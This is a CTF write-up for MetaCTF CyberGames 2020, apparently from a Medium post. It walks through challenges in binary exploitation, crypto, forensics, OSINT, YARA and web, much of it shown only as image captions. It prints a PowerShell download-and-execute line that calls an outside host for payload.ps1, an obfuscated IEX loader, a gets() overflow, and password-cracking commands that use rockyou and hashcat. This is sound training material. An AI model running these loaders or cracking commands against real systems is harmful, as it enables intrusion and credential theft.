MetaCTF logo in front of a computer screen
MetaCTF logo in front of a computer screen
MetaCTF held its annual CyberGames competition on the weekend of October 24th.

MetaCTF CyberGames 2020 Writeup — Last Minute Team Name

Challenges and Kickoff

The MetaCTF Cyber Games 2020 Kickoff on October 24th

Our Strategy

Discord channels showing green checkboxes, a white question mark, or a red question mark
Discord channels showing green checkboxes, a white question mark, or a red question mark
The forensics challenges that I worked on during the competition showing our challenge notation

Binary Exploitation

Baffling Buffer 0

#include <stdio.h>
#include <stdlib.h>

void vuln() {
int isAuthenticated = 0;
char buf[48];
puts("Enter the access code: ");
gets(buf);
puts("TODO: Implement access code checking.");
if(isAuthenticated) {
system("/bin/cat flag.txt");
}
else {
puts("Invalid auth!");
}
}

int main() {
setbuf(stdout, 0);
setbuf(stdin, 0);
setbuf(stderr, 0);
vuln();
return 0;
}
A terminal accessing the challenge and inputting too many characters
A terminal accessing the challenge and inputting too many characters
Inserting “aaaaaa…” into the buffer

Cryptography

Crypto Stands For Cryptography

TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==
Image for post
Image for post
CyberChef with a Base64 recipe

ROT 26

Screenshot showing the ciphertext input to the Dcode website
Screenshot showing the ciphertext input to the Dcode website
Using Dcode with the full ASCII table to see different shifts
Screenshot showing the flag
Screenshot showing the flag
The shift for ASCII[!-~]+26

Welcome to the Obfuscation Games!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA”));IEX (New-Object IO.StreamReader(New-ObjectIO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The Last Great ZIP File

sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip
A screenshot of a terminal running fcrackzip
A screenshot of a terminal running fcrackzip
The fcrackzip command with a rockyou.txt dictionary and the flag.zip file
A screenshot of a terminal running the unzip command
A screenshot of a terminal running the unzip command
Extracting the flag from the .zip file once the password is known
Bad handwriting of the flag
Bad handwriting of the flag
Somebody likes MS Paint.

Board Meeting Gone Wrong

python office2john.py Board_Meeting_Notes.docx
A terminal showing the wordlistgen.py command
A terminal showing the wordlistgen.py command
The WordListGen.py command converting a text file into leet
!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972
A screenshot of a terminal with the Hashcat command and statistics
A screenshot of a terminal with the Hashcat command and statistics
Running Hashcat with the hash obtained from Office2John
A file containing some irrelevant text and the flag
A file containing some irrelevant text and the flag
The Board_Meeting_Notes.docx file

Forensics

Forensics 101

Staging in 1…2…3

A Windows unidentified file icon
A Windows unidentified file icon
123.tmp viewed in Windows
A Linux RAR file icon
A Linux RAR file icon
123.tmp viewed in Linux
A screenshot of the terminal with the Linux file command identifying a RAR file
A screenshot of the terminal with the Linux file command identifying a RAR file
'file’ command output
Screenshot of a terminal with the unrar command and the flag
Screenshot of a terminal with the unrar command and the flag
Using `unrar` to extract the file
MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}

Publish3r

7z x Publish3r.7z
A screenshot of the terminal with the Linux file command identifying a Publisher document
A screenshot of the terminal with the Linux file command identifying a Publisher document
'file’ command output
strings Publish3r.7z > strings.txt
Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
CyberChef Magic results for the encoded string
Screenshot of the CyberChef application with a URL output
Screenshot of the CyberChef application with a URL output
CyberChef Base64 Decode results for the encoded string
IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

Open Thermal Exhaust Port

A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
The packet capture showing port scans from 10.0.2.15 to 10.0.2.6
A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
The packet capture with filters applied
80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid Proxy) = 3770MetaCTF{3770}

Mystery C2

A screenshot of the PacketTotal service with the .pcap file analysis displayed
A screenshot of the PacketTotal service with the .pcap file analysis displayed
PacketTotal identifying the target IP 8.8.4.4 and the target port 443

Just in Time

A screenshot of FTK Imager with the Users folder open
A screenshot of FTK Imager with the Users folder open
AppData folder displayed in the evidence tree in FTK Imager
A screenshot of Excel with the Hindsight .csv file open
A screenshot of Excel with the Hindsight .csv file open
Hindsight’s .csv file export displaying visited URLs, site preferences, and downloads
A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
The Wire IndexedDB folder
A screenshot of FTK Imager displaying the file list with last modified dates
A screenshot of FTK Imager displaying the file list with last modified dates
The log files in the Wire IndexedDB folder
FTK Imager viewing a log file with the word “meet” highligted and an address visible in the same line
FTK Imager viewing a log file with the word “meet” highligted and an address visible in the same line
Searching for the word “meet” in the log file

Multimedia

Watermarked

A screenshot of Audacity with the two audio tracks visualized
A screenshot of Audacity with the two audio tracks visualized
Inverting the audio of the two tracks in Audacity
MetaCTF{p4r7ing_7h3_w4v3z}

Reconnaissance

Big Breaches

Not So Itsy Bitsy Spider

A search result “Ryuk in 5 Hours — The DFIR Report”
A search result “Ryuk in 5 Hours — The DFIR Report”
The first result when searching for “Ryuk CVE 2020”
A screenshot of CVE-2020–1472 from the NIST NVD
A screenshot of CVE-2020–1472 from the NIST NVD
The National Vulnerability Database (NVD) listing for CVE-2020–1472

Diving into the announcement

Finding Mr. Casyn

Google search results for “mr. casyn”
Google search results for “mr. casyn”
Lots of “Casyn”s available online, I guess…
A screenshot of the Wikipedia page for the Chicago metropolitan area
A screenshot of the Wikipedia page for the Chicago metropolitan area
Wikipedia’s list of cities considered part of “Chicagoland”
Google search results for “casyn hammond”
Google search results for “casyn hammond”
A relevant link
A screenshot of Vedder Casyn’s Twitter profile
A screenshot of Vedder Casyn’s Twitter profile
Found you, Vedder Casyn!

Complete Transparency

Screenshot of a 403 Forbidden error
Screenshot of a 403 Forbidden error
A 403 error from Cloudflare
A screenshot of the Censys website showing the subdoimains of icmpindustries.com
A screenshot of the Censys website showing the subdoimains of icmpindustries.com
Censys, a tool that indexes certificates issued to websites, among other things

Ring Ring

A screenshot of a GitHub commit containing a phone number
A screenshot of a GitHub commit containing a phone number
He removed his phone number from his website but forgot to rewrite his commit history!

Hangout Spots

A screenshot of a restaurant on Vedder Casyn’s website
A screenshot of a restaurant on Vedder Casyn’s website
Unfortunately, it doesn’t look like this is his hangout spot.
A screenshot of a GitHub commit containing an image link
A screenshot of a GitHub commit containing an image link
He forgot to rewrite his commit history again.
A photo of a building with sun glare
A photo of a building with sun glare
There is an antenna with two satellites on it in the background. Is this enough to find the location?
A screenshot of the FCC antenna search application
A screenshot of the FCC antenna search application
All antenna structures must be registered with the FCC in this database.
A screenshot of the FCC’s antenna structure database with results
A screenshot of the FCC’s antenna structure database with results
The sixth result is interesting…
An antenna structure with two dome satellites affixed halfway up
An antenna structure with two dome satellites affixed halfway up
The satellites’ positions appear to match.
Image for post
Image for post
Two nearby buildings have matching roofs.
Image for post
Image for post
That’s a match!

Reverse Engineering

[REDACTED]

A memo with a black redaction bar placed on top of the flag
A memo with a black redaction bar placed on top of the flag
The redacted PDF document
A screenshot of the terminal with peepdf results
A screenshot of the terminal with peepdf results
There is a large jump between the fifth and sixth offsets.
PPDF> rawstream 5 > docoutput.jpg
The memo without a black redaction bar placed on top of the flag
The memo without a black redaction bar placed on top of the flag
The flag is clearly visible.

Precision Matching

A screenshot of the Yara Rule Checking application with a blank rule pre-filled
A screenshot of the Yara Rule Checking application with a blank rule pre-filled
The Yara Rule Checker, how nice!
rule yarp {
condition:
false
}
A screenshot of the Yara Rule Checking application with no matches
A screenshot of the Yara Rule Checking application with no matches
Yara matching results for the empty rule
rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
false
}
A screenshot of the Yara Rule Checking application matching all files
A screenshot of the Yara Rule Checking application matching all files
Yara rule matching for the string rule
rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
$crt in (0x1..0x0002CC50)
}
A screenshot of the Yara Rule Checking application matching with two false positives
A screenshot of the Yara Rule Checking application matching with two false positives
Yara rule matching for the dynamic calls rule
import "pe"rule yarp {
strings:
$crt = "CreateRemoteThread"
condition:
$crt in (0x1..0x0002CC50)
pe.linker_version.minor > 20
}
A screenshot of the Yara Rule Checking application matching correctly
A screenshot of the Yara Rule Checking application matching correctly
Yara rule matching for the linker version rule

Web Exploitation

High Security Fan Page

function authenticate(){
var username = document.getElementById("inputUsername").value;
var password = document.getElementById("inputPassword").value;
var notFailed = true;
if(username!="ChrisM"){
alert("You did not enter the correct username!");
notFailed = false;
}
if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
alert("You did not enter the correct password!");
notFailed = false;
}
if(notFailed){
alert("Hiya!");
window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
}
}

Barry’s Web Application

A screenshot of the “Barry’s web server” website
A screenshot of the “Barry’s web server” website
Barry’s website
A screenshot of the OWASP ZAP main page
A screenshot of the OWASP ZAP main page
ZAP is OWASP’s automated web vulnerability scanner.
A screenshot of ZAP’s results for Barry’s website
A screenshot of ZAP’s results for Barry’s website
“Directory browsing is enabled.”
A screenshot of a webpage showign the flag
A screenshot of a webpage showign the flag
The hidden file in the ‘/docs’ directory

Everyone Loves a Good Cookie

A screenshot of the website prompting for a secret code
A screenshot of the website prompting for a secret code
We don’t have a secret code, oh no…
A screenshot of Chrome’s cookie manager
A screenshot of Chrome’s cookie manager
The cm-authenticated cookie set by the website
A screenshot of BurpSuite’s proxy tool
A screenshot of BurpSuite’s proxy tool
BurpSuite is a popular web application manipulation tool and proxy.
A screenshot of BurpSuite’s repeater tool
A screenshot of BurpSuite’s repeater tool
The ‘cm-authenticated’ cookie is set to 1. Do we still need a password?
A screenshot of BurpSuite’s repeater tool
A screenshot of BurpSuite’s repeater tool
The flag is visible in the response.

Bonus Flags

CyberGames 2020 Design Bonus

The logo with various encodings in the image
The logo with various encodings in the image
The CyberGames 2020 logo

In Conclusion

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store